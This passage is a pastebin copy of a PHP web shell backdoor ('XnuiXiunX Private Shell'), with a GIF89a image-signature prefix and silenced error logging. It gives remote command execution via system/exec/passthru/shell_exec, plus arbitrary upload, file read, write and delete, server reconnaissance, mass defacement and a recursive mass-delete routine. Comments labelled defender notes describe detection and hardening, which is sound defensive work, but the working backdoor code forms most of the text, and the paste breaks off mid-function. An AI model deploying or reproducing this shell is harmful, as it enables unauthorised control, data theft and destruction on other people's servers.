
XnuiXiunX Private Shell

a guest
Feb 23rd, 2020
774
0
Never
text 58.99 KB | None | 0 0
  1. <!DOCTYPE html>
  2. GIF89a;
  3. <?php
  4. /*
  5. [ Tak semua kami ngotak sendiri ]
  6. Special thanks for Holiq@Indosec
  7. Collabs team 22XploiterCrew ft Indosec Coder Team
  8. */
  9.  
  // Defender note: request-wide setup that hides this script from PHP's own diagnostics.
  // error_reporting(0), display_errors=0, log_errors=0 and a NULL error_log stop PHP from
  // showing or recording errors; set_time_limit(0) and max_execution_time=0 lift the run-time cap.
  // Most calls are prefixed with @, so a refused setting produces no warning either.
  // Triage should therefore lean on web-server access logs and file-integrity data, not PHP error logs.
  // The "GIF89a;" text ahead of the PHP open tag is a prefix often seen on uploaded web shells;
  // upload filters should not treat a leading image signature as proof that a file is an image.
  10. error_reporting(0);
  11. set_time_limit(0);
  12. @clearstatcache();
  13. @ini_set('error_log',NULL);
  14. @ini_set('log_errors',0);
  15. @ini_set('max_execution_time',0);
  16. @ini_set('output_buffering',0);
  17. @ini_set('display_errors', 0);
  18.  
  // Colour-codes a permission string by writability: wraps $perm in a red <font> tag when
  // is_writable($dir) is false and a lime one otherwise.
  // $perm is concatenated into the HTML without escaping.
  19. function w($dir,$perm) {
  20. if(!is_writable($dir)) {
  21. return "<font color=red>".$perm."</font>";
  22. } else {
  23. return "<font color=lime>".$perm."</font>";
  24. }
  25. }
  // Colour-codes a permission string by readability: wraps $perm in a red <font> tag when
  // is_readable($dir) is false and a lime one otherwise.
  // $perm is concatenated into the HTML without escaping.
  26. function r($dir,$perm) {
  27. if(!is_readable($dir)) {
  28. return "<font color=red>".$perm."</font>";
  29. } else {
  30. return "<font color=lime>".$perm."</font>";
  31. }
  32. }
  33.  
  // Command-execution primitive of this script: passes $cmd to the first of system(),
  // exec(), passthru(), shell_exec() that function_exists() reports and returns the captured
  // output. When none of the four is reported, the function falls through without a return value.
  // $cmd reaches the OS shell unmodified; the folder-delete handler in this file interpolates
  // request data into it.
  // Detection: shell or interpreter child processes started by the web-server / PHP user.
  // Hardening: listing these four functions in disable_functions closes this path.
  // NOTE(review): how function_exists() reports disabled functions depends on the PHP version — confirm.
  34. function exe($cmd) {
  35. if(function_exists('system')) {
  // system() prints directly, so its output is caught with an output buffer.
  36. @ob_start();
  37. @system($cmd);
  38. $buff = @ob_get_contents();
  39. @ob_end_clean();
  40. return $buff;
  41. } elseif(function_exists('exec')) {
  42. @exec($cmd,$results);
  43. $buff = "";
  // Output lines are joined with no separator between them.
  44. foreach($results as $result) {
  45. $buff .= $result;
  46. } return $buff;
  47. } elseif(function_exists('passthru')) {
  48. @ob_start();
  49. @passthru($cmd);
  50. $buff = @ob_get_contents();
  51. @ob_end_clean();
  52. return $buff;
  53. } elseif(function_exists('shell_exec')) {
  54. $buff = @shell_exec($cmd);
  55. return $buff;
  56. }
  57. }
  58.  
  // Renders fileperms($file) as an ls-style string: one type character (s, l, -, b, d, c, p,
  // or u when no type mask matches) followed by rwx triplets for owner, group and world.
  // In the execute position, s/S mark the setuid and setgid bits and t/T the sticky bit;
  // upper case means the special bit is set without the execute bit.
  // Only file metadata is read; nothing is modified.
  59. function perms($file){
  60. $perms = fileperms($file);
  61.  
  // File-type bits, tested from the highest mask downwards.
  62. if (($perms & 0xC000) == 0xC000) {
  63. // Socket
  64. $info = 's';
  65. } elseif (($perms & 0xA000) == 0xA000) {
  66. // Symbolic Link
  67. $info = 'l';
  68. } elseif (($perms & 0x8000) == 0x8000) {
  69. // Regular
  70. $info = '-';
  71. } elseif (($perms & 0x6000) == 0x6000) {
  72. // Block special
  73. $info = 'b';
  74. } elseif (($perms & 0x4000) == 0x4000) {
  75. // Directory
  76. $info = 'd';
  77. } elseif (($perms & 0x2000) == 0x2000) {
  78. // Character special
  79. $info = 'c';
  80. } elseif (($perms & 0x1000) == 0x1000) {
  81. // FIFO pipe
  82. $info = 'p';
  83. } else {
  84. // Unknown
  85. $info = 'u';
  86. }
  87.  
  88. // Owner
  89. $info .= (($perms & 0x0100) ? 'r' : '-');
  90. $info .= (($perms & 0x0080) ? 'w' : '-');
  91. $info .= (($perms & 0x0040) ?
  92. (($perms & 0x0800) ? 's' : 'x' ) :
  93. (($perms & 0x0800) ? 'S' : '-'));
  94. // Group
  95. $info .= (($perms & 0x0020) ? 'r' : '-');
  96. $info .= (($perms & 0x0010) ? 'w' : '-');
  97. $info .= (($perms & 0x0008) ?
  98. (($perms & 0x0400) ? 's' : 'x' ) :
  99. (($perms & 0x0400) ? 'S' : '-'));
  100.  
  101. // World
  102. $info .= (($perms & 0x0004) ? 'r' : '-');
  103. $info .= (($perms & 0x0002) ? 'w' : '-');
  104. $info .= (($perms & 0x0001) ?
  105. (($perms & 0x0200) ? 't' : 'x' ) :
  106. (($perms & 0x0200) ? 'T' : '-'));
  107.  
  108. return $info;
  109. }
  110.  
  111.  
  // Working-directory selection and host fingerprinting, executed on every request.
  // $_GET['path'] and $_GET['dir'] go straight into chdir() with no validation, so the
  // requester picks any directory the web user is able to enter.
  // The remaining lines collect environment facts: php_uname(), the host's resolved IP,
  // the PHP version, HTTP_HOST, safe_mode, disable_functions, whether mysql_connect and
  // curl_version exist, and disk totals for $path.
  // Detection: exe('wget --help'), exe('perl --help') and exe('python --help') run on each
  // page load, so every hit on this script starts those three processes under the web user.
  112. if(isset($_GET['path'])){
  113. $path = $_GET['path'];
  114. chdir($path);
  115. }else{
  116. $path = getcwd();
  117. }
  118. $path = str_replace('\\','/',$path);
  119. $paths = explode('/',$path);
  120. if(isset($_GET['dir'])) {
  121. $dir = $_GET['dir'];
  122. chdir($dir);
  123. } else {
  124. $dir = getcwd();
  125. }
  126. $kernel = php_uname();
  127. $ip = getHostByName(getHostName());
  128. $ver = phpversion();
  129. $dom = $_SERVER['HTTP_HOST'];
  130. $dir = str_replace("\\","/",$dir);
  131. $scdir = explode("/", $dir);
  132. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "On" : "Off";
  133. $ds = @ini_get("disable_functions");
  134. $mysql = (function_exists('mysql_connect')) ? "<font color=black>On</font>" : "<font color=red>Off</font>";
  135. $curl = (function_exists('curl_version')) ? "<font color=black>On</font>" : "<font color=red>Off</font>";
  // Tool presence is inferred from whether the command produced any output.
  136. $wget = (exe('wget --help')) ? "<font color=black>On</font>" : "<font color=red>Off</font>";
  137. $perl = (exe('perl --help')) ? "<font color=black>On</font>" : "<font color=red>Off</font>";
  138. $python = (exe('python --help')) ? "<font color=black>On</font>" : "<font color=red>Off</font>";
  139. $show_ds = (!empty($ds)) ? "$ds" : "NONE";
  140. $total = formatSize(disk_total_space($path));
  141. $free = formatSize(disk_free_space($path));
  142. $total1 = disk_total_space($path);
  143. $free1 = disk_free_space($path);
  144. $used = formatSize($total1 - $free1);
  // Converts a byte count into a human-readable string: divides by 1024 until the value
  // drops below 1024 or the largest unit (TB) is reached, then rounds to two decimals
  // and appends the unit.
  145. function formatSize( $bytes ) {
  146. $types = array( 'B', 'KB', 'MB', 'GB', 'TB' );
  // Empty-bodied loop: all the work happens in the for() header.
  147. for( $i = 0; $bytes >= 1024 && $i < ( count( $types ) -1 ); $bytes /= 1024, $i++ );
  148. return( round( $bytes, 2 ) . " " . $types[$i] );
  149. }
  150.  
  // Returns the part of $param that lies between the first occurrence of $kata1 and the
  // next occurrence of $kata2 after it. Returns FALSE when either marker is absent from $param.
  // No caller is visible in this part of the file.
  151. function ambilKata($param, $kata1, $kata2){
  152. if(strpos($param, $kata1) === FALSE) return FALSE;
  153. if(strpos($param, $kata2) === FALSE) return FALSE;
  // $start is the offset just past $kata1; $kata2 is searched for from there.
  154. $start = strpos($param, $kata1) + strlen($kata1);
  155. $end = strpos($param, $kata2, $start);
  156. $return = substr($param, $start, $end - $start);
  157. return $return;
  158. }
  159.  
  // Emits the page shell in one double-quoted string: <head> with third-party CSS/JS links,
  // inline JS and CSS, and the navigation menu.
  // $dir (taken from the request) is interpolated into every menu href without escaping.
  // The aksi= values in the menu name the handlers this script exposes: upload, buat_file,
  // buat_folder, MassDeface, MassDellete, jumping, config, adminer, symlink, CpanelReset, InfoServer.
  // Defender note: the fixed strings below (title, meta author/description, aksi names) are
  // stable material for content-based scanning of web roots, and the aksi= parameter values
  // are what to search for in access logs. The external asset URLs are fetched by the
  // viewer's browser, not by the server.
  160. echo "
  161. <html>
  162. <title>XnuiXiunX Private Shell</title>
  163. <head>
  164. <meta name='viewport' content='widht=device-widht, initial-scale=0.75'>
  165. <link rel='icon' type='image/png' href='https://avatars3.githubusercontent.com/u/53482167?s=460&v=4'/>
  166. <meta name='author' content='XnuiXiunX'/>
  167. <meta name='copyright' content='Indonesian Error System'/>
  168. <meta name='description' content='Imutz Shell Backdoor'>
  169. <meta name='theme-color' content='#000'>
  170. <link rel='stylesheet' href='https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css'>
  171. <link rel='stylesheet' href='https://use.fontawesome.com/releases/v5.7.2/css/all.css' >
  172. <link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css'>
  173. <script src='https://code.jquery.com/jquery-3.3.1.js'></script>
  174. <script src='https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js'></script>
  175. <link href='http://fonts.googleapis.com/css?family=Quicksand' rel='stylesheet' type='text/css'>
  176. </head>
  177. <body class='text-light'>
  178. <script>
  179. $(document).ready(function(){
  180. $(window).scroll(function(){
  181. if ($(this).scrollTop() > 700) {
  182. $('.scrollToTop').fadeIn();
  183. }else{
  184. $('.scrollToTop').fadeOut();
  185. }
  186. });
  187. $('.scrollToTop').click(function(){
  188. $('html, body').animate({scrollTop : 0},1000);
  189. return false;
  190. });
  191. });
  192. </script>
  193. <style>
  194. body{background-color:black;}
  195. @import url(https://fonts.googleapis.com/css?family=Lato);
  196. body{margin:0;padding:0;font-family:'Lato';}
  197. #tab table thead th{padding:5px;font-size:16px;}
  198. #tab tr {border-bottom:1px solid #fff;}
  199. #tab tr:hover{background:#5B6F7D; color:#fff;}
  200. #tab tr td{padding:5px;}
  201. #tab tr td .badge{font-size:13px;}
  202. a {font-family:'Quicksand';color:white;}
  203. a:hover{color:dodgerBlue;}
  204. .ico {width:20px;}
  205. .ico2{width:20px;}
  206. .scrollToTop{
  207. position:fixed;
  208. bottom:30px;
  209. right:30px;
  210. width:35px;
  211. height:35px;
  212. background:#262626;
  213. color:#fff;
  214. border-radius:15%;
  215. text-align:center;
  216. opacity:.5;
  217. }
  218. .scrollToTop:hover{color:#fff;}
  219. .up{font-size:20px;line-height:35px;}
  220. .lain{color:#888888;font-size:20px;margin-left:5px;top:1px;}
  221. .lain:hover{color:#fff;}
  222. .tambah{
  223. width:35px;
  224. height:35px;
  225. line-height:35px;
  226. border:1px solid;
  227. border-radius:50%;
  228. text-align:center;
  229. }
  230. .fiture{margin:2px;}
  231. .tmp{background:#F4F4F4;color:rgb(153,153,153);}
  232. .tmp tr td{border:solid 1px #BBBBBB;text-align:center;font-size:13px;}
  233. .about{color:#000;}
  234. .about .card-body .img{
  235. position: relative;
  236. background: url(https://i.postimg.cc/Wb1X4xNS/image.png);
  237. background-size: cover;
  238. width: 150px;
  239. height: 150px;
  240. }
  241. .butn {
  242. position: relative;
  243. text-align: center;
  244. padding: 3px;
  245. background:rgba(225,225,225,.3);
  246. -webkit-transition: background 300ms ease, color 300ms ease;
  247. transition: background 300ms ease, color 300ms ease;
  248. }
  249. input[type='radio'].toggle {
  250. display: none;
  251. }
  252. input[type='radio'].toggle + label {
  253. cursor: pointer;
  254. margin: 0 2px;
  255. width: 60px;
  256. }
  257. input[type='radio'].toggle + label:after {
  258. position: absolute;
  259. content: '';
  260. top: 0;
  261. background: #fff;
  262. height: 100%;
  263. width: 100%;
  264. z-index: -1;
  265. -webkit-transition: left 400ms cubic-bezier(0.77, 0, 0.175, 1);
  266. transition: left 400ms cubic-bezier(0.77, 0, 0.175, 1);
  267. }
  268. input[type='radio'].toggle.toggle-left + label:after {
  269. left: 100%;
  270. }
  271. input[type='radio'].toggle.toggle-right + label {
  272. margin-left: -5px;
  273. }
  274. input[type='radio'].toggle.toggle-right + label:after {
  275. left: -100%;
  276. }
  277. input[type='radio'].toggle:checked + label {
  278. cursor: default;
  279. color: #000;
  280. -webkit-transition: color 400ms;
  281. transition: color 400ms;
  282. }
  283. input[type='radio'].toggle:checked + label:after {
  284. left: 0;
  285. }
  286. </style>
  287. <nav class='navbar static-top navbar-dark'>
  288. <button class='navbar-toggler'type='button' data-toggle='collapse' data-target='#info'>
  289. <i style='color:#fff;' class='fa fa-user'></i>
  290. </button>
  291. <div class='collapse navbar-collapse' id='info'>
  292. <div class='table-responsive-lg'>
  293. <ul>
  294. <a href='?' class='fiture btn btn-primary btn-sm btn-block mb-2'><i class='fa fa-home'></i> Home</a>
  295. <div class='row'>
  296. <div class='col'>
  297. <a href='?dir=$dir&aksi=upload' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-upload'></i> Upload</a>
  298. </div>
  299. <div class='col'>
  300. <a href='?dir=$dir&aksi=buat_file' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-plus-circle'></i> Buat File</a>
  301. </div>
  302. <div class='col'>
  303. <a href='?dir=$dir&aksi=buat_folder' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-plus'></i> Buat Folder</a>
  304. </div>
  305. </div>
  306. <div class='row'>
  307. <div class='col'>
  308. <a href='?dir=$dir&aksi=MassDeface' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-exclamation-triangle'></i> Mass Deface</a>
  309. </div>
  310. <div class='col'>
  311. <a href='?dir=$dir&aksi=MassDellete' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-trash'></i> Mass Delete</a>
  312. </div>
  313. <div class='col'>
  314. <a href='?dir=$dir&aksi=jumping' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-exclamation-triangle'></i> Jumping</a>
  315. </div>
  316. </div>
  317. <div class='row'>
  318. <div class='col'>
  319. <a href='?dir=$dir&aksi=config' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-cogs'></i> Config</a>
  320. </div>
  321. <div class='col'>
  322. <a href='?dir=$dir&aksi=adminer' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-user'></i> Adminer</a>
  323. </div>
  324. <div class='col'>
  325. <a href='?dir=$dir&aksi=symlink' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-exclamation-circle'></i> Symlink</a>
  326. </div>
  327. </div>
  328. <div class='row'>
  329. <div class='col'>
  330. <a href='?dir=$dir&aksi=CpanelReset' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-key'></i> Auto Reset Cpanel</a>
  331. </div>
  332. <div class='col'>
  333. <a href='?keluar' class='fiture btn btn-warning btn-sm btn-block'><i class='fa fa-sign-out'></i> keluar</a>
  334. </div>
  335. </div>
  336. <a href='?dir=$dir&aksi=InfoServer' class='fiture btn btn-info btn-sm btn-block mt-2'>Info Server</a>
  337. </ul>
  338. </div>
  339. </div>
  340. </nav>
  341. <div class=''>
  342. <h1 class='text-center'><a href='http://racetomars.net/'>[ > ] XnuiXiunX Private Shell [ < ]</h1>
  343. <center><p>Silent But Deadly and This Exploit will Shut You Down!!</a></p></center>
  344. <hr/>";
  345. // logout
  // Starts and immediately destroys the PHP session, then redirects the browser to the
  // bare script URL.
  // NOTE(review): no session or password check guards any handler in the visible part of
  // this file; confirm against the remainder whether access to the script is gated at all.
  346. if (isset($_GET['keluar'])) {
  347. session_start();
  348. session_destroy();
  349. echo '<script>window.location="?";</script>';
  350. }
  351.  
  352. // Info Server
  // Prints the environment facts gathered at the top of the script together with raw
  // $_SERVER entries (server name, address, port, software, document root, client IP and
  // User-Agent). All values are concatenated into the HTML without escaping.
  // Defender note: access-log entries carrying aksi=InfoServer indicate reconnaissance of
  // the host through this script.
  353. if($_GET['aksi'] == 'InfoServer'){
  354. echo '
  355. <div class="alert alert-info mt-3">
  356. <h3 class="text-center">Informasi Server</h3><hr>
  357. <li>Nama Server : '.$_SERVER["SERVER_NAME"].'</li>
  358. <li>Ip Address : '.$_SERVER["SERVER_ADDR"].'</li>
  359. <li>Port : '.$_SERVER["SERVER_PORT"].'</li>
  360. <li>HDD : '.$used.' / '.$total.'</font> ( Free: '.$free.' )</li>
  361. <li>Protokol : '.$_SERVER["SERVER_PROTOCOL"].'</li>
  362. <li>Save Data : '.$_SERVER["HTTP_SAVE_DATA"].'</li>
  363. <li>Save Mode : '.$sm.'</li>
  364. <li>Fungsi Nonaktif : '.$show_ds.'</li>
  365. <li>Koneksi : '.$_SERVER["HTTP_CONNECTION"].'</li>
  366. <li>Software : '.$_SERVER["SERVER_SOFTWARE"].'</li>
  367. <li>Dokumen Root : '.$_SERVER["DOCUMENT_ROOT"].'</li>
  368. <li>G-Interface : '.$_SERVER["GATEWAY_INTERFACE"].'</li>
  369. <li>R-Method : '.$_SERVER["REQUEST_METHOD"].'</li>
  370. <li>Mysql : '.$mysql.'</li>
  371. <li>Perl : '.$perl.'</li>
  372. <li>Wget : '.$wget.'</li>
  373. <li>Curl : '.$curl.'</li>
  374. <li>Sistem Server : '.$kernel.'</li>
  375. <hr>
  376. <li>Your IP: '.$_SERVER["REMOTE_ADDR"].'</li>
  377. <li>Your Browser : '.$_SERVER["HTTP_USER_AGENT"].'</li>
  378. </div>';
  379. }
  380.  
  381. // upload
  // Arbitrary file upload: the posted file is copied from its temp path to
  // $dir/<client-supplied file name>. No type, extension or size check is applied, and
  // copy() is used rather than move_uploaded_file(). $dir comes from $_GET['dir'].
  // Detection: multipart POST requests to this script with aksi=upload, followed by new
  // files owned by the web user in the named directory.
  // Mitigation: keep web roots non-writable for the PHP user and disable script execution
  // in any directory that must stay writable.
  382. if ($_GET['aksi'] == 'upload') {
  383. echo
  384. "<form method='post' enctype='multipart/form-data' name='uploader' id='uploader'>
  385. <div class='form-group'>
  386. <label>Upload File: </label><br>
  387. <input class='' type='file' name='file'>
  388. </div>
  389. <div class='form-group'>
  390. <input class='btn btn-primary btn-sm' type='submit' value='Upload'>
  391. </div>
  392. </form>";
  393.  
  394. if(isset($_FILES['file'])){
  395. if(@copy($_FILES['file']['tmp_name'],$dir.'/'.$_FILES['file']['name'])){
  396. echo '<script>window.location="?dir='.$dir.'"; alert("Upload Berhasil");</script>';
  397. }else{
  398. echo '<script>alert("Gagal Upload!!!");</script>';
  399. }
  400. }
  401. }
  402.  
  403. // open file
  // Target path for the view, edit, rename and delete handlers below, taken from
  // $_GET['dirf'] with no validation or confinement to a base directory.
  404. if (isset($_GET['dirf'])) {
  405. $file = $_GET['dirf'];
  406. }
  407.  
  408. // create file
  // Arbitrary file write: on POST 'bikin', $_POST['isi_file'] is written to the path given
  // in $_POST['nama_file']. The file is opened with mode "w", so an existing file at that
  // path is truncated. The path is used as supplied, relative to the directory selected by
  // the chdir() calls at the top of the script.
  // Detection: POST requests with aksi=buat_file and new or rewritten files owned by the web user.
  409. if ($_GET['aksi'] == 'buat_file') {
  410.  
  411. $output = "
  412. <form method='post'>
  413. <input type='text' class='form-control mb-3' name='nama_file' placeholder='Nama File'>
  414. <textarea name='isi_file' class='form-control mb-3' rows='8' placeholder='Isi File'></textarea>
  415. <button type='sumbit' class='btn btn-outline-primary btn-block' name='bikin'>Buat</button><br/>
  416. </form>";
  417. echo $output;
  418.  
  419. if (isset($_POST['bikin'])) {
  420. $nama_file = $_POST['nama_file'];
  421. $isi_file = $_POST['isi_file'];
  422. $handle = fopen("$nama_file", "w");
  423.  
  424. if (fwrite($handle, $isi_file)) {
  425. echo '<script>window.location="?dir='.$dir.'"; alert("Buat File Berhasil");</script>';
  426. }else{
  427. echo '<script>("File Gagal Dibuat");</script>';
  428. }
  429. }
  430. }
  431.  
  432. /*
  433. View
  434. */
  // Arbitrary file read: prints the contents of $file (from $_GET['dirf']) inside a
  // disabled textarea. The file body is passed through htmlspecialchars(); $path and $file
  // in the navigation links are not escaped.
  // Anything readable by the web user — including configuration files holding credentials —
  // is exposed through this handler, so credentials on an affected host should be rotated.
  435. if($_GET['aksi'] == 'view') {
  436. echo '<center>[ <a href="?dir='.$path.'&aksi=view&dirf='.$file.'">Lihat</a> ]
  437. [ <a href="?dir='.$path.'&aksi=edit&dirf='.$file.'">Edit</a> ]
  438. [ <a href="?dir='.$path.'&aksi=hapusf&dirf='.$file.'">Delete</a> ]</center>';
  439. echo "
  440. <textarea rows='16' class='form-control mt-3' disabled=''>".htmlspecialchars(file_get_contents($file))."</textarea>
  441. <br/><br/>";
  442. }
  443.  
  444. /*
  445. Edit
  446. */
  // Shows $file in an editable textarea and, on POST 'edit_file', overwrites it with
  // $_POST['isi'] (opened with mode "w"). $file comes from $_GET['dirf'].
  // Defender note: this is how existing application files get modified in place; compare
  // web-root files against a known-good copy or version control rather than trusting mtimes alone.
  447. if($_GET['aksi'] == 'edit') {
  448. $nama = basename($file);
  449. echo '<center>[ <a href="?dir='.$path.'&aksi=view&dirf='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=rename&dirf='.$file.'">Ubah Nama</a> ]
  450. [ <a href="?dir='.$path.'&aksi=hapusf&dirf='.$file.'">Delete</a> ]</center><hr>';
  451. echo "<form method='post' class='mt-3'>
  452. <p class='ml-2'><i class='fa fa-file'></i> $nama</p>
  453. <textarea rows='16' class='form-control mb-3' name='isi'>".htmlspecialchars(file_get_contents($file))."</textarea>
  454. <button type='sumbit' class='btn btn-info btn-block' name='edit_file'>Ubah</button>
  455. </form><br/>";
  456.  
  457. if(isset($_POST['edit_file'])) {
  458. $updt = fopen("$file", "w");
  459. $hasil = fwrite($updt, $_POST['isi']);
  460.  
  461. if ($hasil) {
  462. echo '<script>window.location="?dir='.$dir.'"; alert("Berhasil Mengubah Isi File");</script>';
  463. }else{
  464. echo '<script>alert("Gagal Mengubah Isi File");</script>';
  465. }
  466. }
  467. }
  468.  
  469. /*
  470. Rename
  471. */
  // Rename handler for $file (from $_GET['dirf']); the new name is $_POST['namanew'].
  // On POST 'rename_file' the code first calls rename($baru, $lama), then reports the name
  // as taken if $baru exists, and otherwise calls rename($lama, $baru).
  // Both paths are request-supplied and unvalidated, and $baru is echoed into a <script>
  // block without escaping.
  472. if($_GET['aksi'] == 'rename') {
  473. $nama = basename($file);
  474. echo '<center>[ <a href="?dir='.$path.'&aksi=edit&dirf='.$file.'">Kembali</a> ]</center>';
  475. echo "<form method='post' class='mt-3'>
  476. <p class='ml-2'><i class='fa fa-file'></i> $nama</p>
  477. <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...'><br/>
  478. <button type='sumbit' class='btn btn-info btn-block' name='rename_file'>Update</button><br/>
  479. </form><br/>";
  480.  
  481. if(isset($_POST['rename_file'])) {
  482. $lama = $file;
  483. $baru = $_POST['namanew'];
  484. rename( $baru, $lama);
  485. if(file_exists($baru)) {
  486. echo '<script>alert("Nama '.$baru.' Telah Digunakan");</script>';
  487. }else{
  488. if(rename( $lama, $baru)) {
  489. echo '<script>window.location="?dir='.$dir.'"; alert("Sukses Mengganti Nama Menjadi '.$baru.'");</script>';
  490. }else{
  491. echo '<script>alert("Gagal Mengganti Nama");</script>';
  492. }
  493. }
  494. }
  495. }
  496.  
  497. /*
  498. Delete File
  499. */
  // Shows a confirmation form and, when $_POST['ya'] is set, calls unlink($file).
  // $file comes from $_GET['dirf'], so any file the web user may delete is in scope.
  // Defender note: missing application or log files after requests with aksi=hapusf point
  // to this handler; restore from backup rather than assuming only the reported file changed.
  500. if ($_GET['aksi'] == 'hapusf') {
  501. $nama = basename($file);
  502. echo '<center>
  503. [ <a href="?dir='.$path.'&aksi=view&dirf='.$file.'">Lihat</a> ]
  504. [ <a href="?dir='.$path.'&aksi=edit&dirf='.$file.'">Edit</a> ]
  505. [ <a href="?dir='.$dir.'&aksi=rename&dirf='.$file.'">Ubah Nama</a> ]</center>';
  506. $output ="
  507. <div class=''>
  508. <center><br/>
  509. <font color='white'>Yakin Ingin Menghapus File : $nama
  510. </center><br/><br/>
  511. <form method='post'>
  512. <div class='row'>
  513. <div class='col'>
  514. <input type='submit' name='ya' class='float-right btn btn-success btn-success btn-block' value='Ya'>
  515. </div>
  516. <div class='col'>
  517. <a class='btn btn-danger btn-block' href='?dir=$dir'>Tidak</a>
  518. </div>
  519. </div>
  520. </form>
  521. </div><br/>";
  522. echo $output;
  523.  
  524. if ($_POST['ya']) {
  525. $hapus = unlink($file);
  526. if ($hapus) {
  527. echo '<script>window.location="?dir='.$dir.'"; alert("Berhasil Menghapus File");</script>';
  528. }else{
  529. echo '<script>alert("Gagal Menghapus File!");</script>';
  530. }
  531. }
  532. }
  533.  
  534. /*
  535. Add Folder
  536. */
  // Creates a directory named from $_POST['nama_folder'] in the current working directory.
  // This is the only handler in the visible part of the file that filters its input:
  // preg_replace() strips characters outside an allow-list and runs of two or more dots
  // before mkdir() is called. $nama_folder is assigned but the filtered $folder is what is used.
  537. if ($_GET['aksi'] == 'buat_folder' ) {
  538. $output = "
  539. <form method='post'>
  540. <input type='text' class='form-control mb-4' name='nama_folder' placeholder='Nama Folder'>
  541. <button type='sumbit' class='btn btn-outline-primary btn-block' name='buat'>Buat</button><br/>
  542. </form>";
  543. echo $output;
  544.  
  545. if (isset($_POST['buat'])) {
  546. $nama_folder = $_POST['nama_folder'];
  547. $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $_POST["nama_folder"]);
  548. $fd = mkdir ($folder);
  549. if ($fd) {
  550. echo '<script>window.location="?dir='.$dir.'"; alert("Berhasil Membuat Folder");</script>';
  551. }else{
  552. echo "echo '<script> alert('Folder ".$folder." Gagal Dibuat');</script>";
  553. }
  554. }
  555. }
  556.  
  557. /*
  558. Delete Folder
  559. */
  // Shows a confirmation form and, when $_POST['ya'] is set and $dir is a writable
  // directory, removes it three ways: rmdir(), then "rm -rf $dir" and "rmdir /s /q $dir"
  // through exe(). $dir comes from $_GET['dir'] and is interpolated into both command
  // strings without quoting or escaping, so request data reaches the OS shell here.
  // The script exits after this handler.
  // Detection: an "rm -rf" or "rmdir /s /q" process whose parent is the web server or PHP
  // worker, correlated with a request carrying aksi=hapus_folder.
  560. if ($_GET['aksi'] == 'hapus_folder' ) {
  561. $nama = basename(getcwd());
  562. $output ="
  563. <center>[ <a href='?dir=".$dir."&aksi=rename_folder'>Ubah Nama</a> ] [ <a href='?dir=".$dir."&aksi=hapus_folder'>Delete</a> ]</center>
  564. <div class='container'>
  565. <center><br/>
  566. <font color='white'>Yakin Ingin Menghapus Folder : $nama ?
  567. </center><br/><br/>
  568. <form method='post'>
  569. <div class='row'>
  570. <div class='col'>
  571. <input type='submit' name='ya' class='float-right btn btn-success btn-block' value='Iya'>
  572. </div>
  573. <div class='col'>
  574. <a class='btn btn-danger btn-block' href='?dir=".dirname($dir)."'>Tidak</a>
  575. </div>
  576. </div>
  577. </form>
  578. </div><br/>";
  579. echo $output;
  580.  
  581. if ($_POST['ya']) {
  582. if(is_dir($dir)) {
  583. if(is_writable($dir)) {
  584. @rmdir($dir);
  585. @exe("rm -rf $dir");
  586. @exe("rmdir /s /q $dir");
  587. echo "<script>window.location='?dir=".dirname($dir)."'; alert('Berhasil Menghapus Folder');</script>";
  588. } else {
  589. echo "<script>window.location='?dir=".dirname($dir)."'; alert('Tidak Dapat Menghapus Folder');</script>";
  590. }
  591. }
  592. }
  593. exit;
  594. }
  595.  
  596. /*
  597. Rename Folder
  598. */
  // Renames the directory in $dir (from $_GET['dir']) to $_POST['namanew'] on POST 'ganti'.
  // Neither path is validated, so the call can also move the directory to another location
  // the web user can write to. The script exits after this handler.
  599. if ($_GET['aksi'] == 'rename_folder' ) {
  600. $nama = basename(getcwd());
  601. $output="
  602. <center>
  603. [ <a href='?dir=".$dir."&aksi=hapus_folder'>Delete</a> ]<hr></center><p class='ml-2'>Nama Folder => $nama</p>
  604. <form method='post'>
  605. <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...'><br/>
  606. <button type='sumbit' class='btn btn-info btn-block' name='ganti'>Ganti!!</button><br/>
  607. </form>";
  608. echo $output;
  609.  
  610. if (isset($_POST['ganti'])) {
  611. $lama = $dir;
  612. $baru = $_POST['namanew'];
  613. $ubah = rename($lama, $baru);
  614. if($ubah) {
  615. echo "<script>window.location='?dir=".dirname($dir)."'; alert('Berhasil Mengganti Nama');</script>";
  616. }else{
  617. echo "<script>alert('Gagal Mengganti Nama');</script>" ;
  618. }
  619. }
  620. exit;
  621. }
  622.  
  623. /*
  624. Mass delete
  625. */
  // Bulk deletion handler. On POST 'start' it calls hapus_massal() with the directory
  // ($_POST['d_dir']) and file name ($_POST['d_file']) from the form; otherwise it renders
  // the form. The script exits after this handler.
  // Defender note: the footprint is the same file name disappearing from many sibling
  // directories within one request. File-integrity monitoring and backups are the recovery
  // path; the progress output is not a reliable record of what was removed.
  626. if($_GET['aksi'] == 'MassDellete') {
  627.  
  // hapus_massal: when $dir is writable, unlinks $namafile in $dir itself (the '.' entry),
  // in $dir's parent (the '..' entry), and in every writable subdirectory, recursing into
  // each of those. A line is printed for each subdirectory path before unlink() is called.
  628. function hapus_massal($dir,$namafile) {
  629. if(is_writable($dir)) {
  630. $dira = scandir($dir);
  631. foreach($dira as $dirb) {
  632. $dirc = "$dir/$dirb";
  633. $lokasi = $dirc.'/'.$namafile;
  634. if($dirb === '.') {
  635. if(file_exists("$dir/$namafile")) {
  636. unlink("$dir/$namafile");
  637. }
  638. } elseif($dirb === '..') {
  639. if(file_exists("".dirname($dir)."/$namafile")) {
  640. unlink("".dirname($dir)."/$namafile");
  641. }
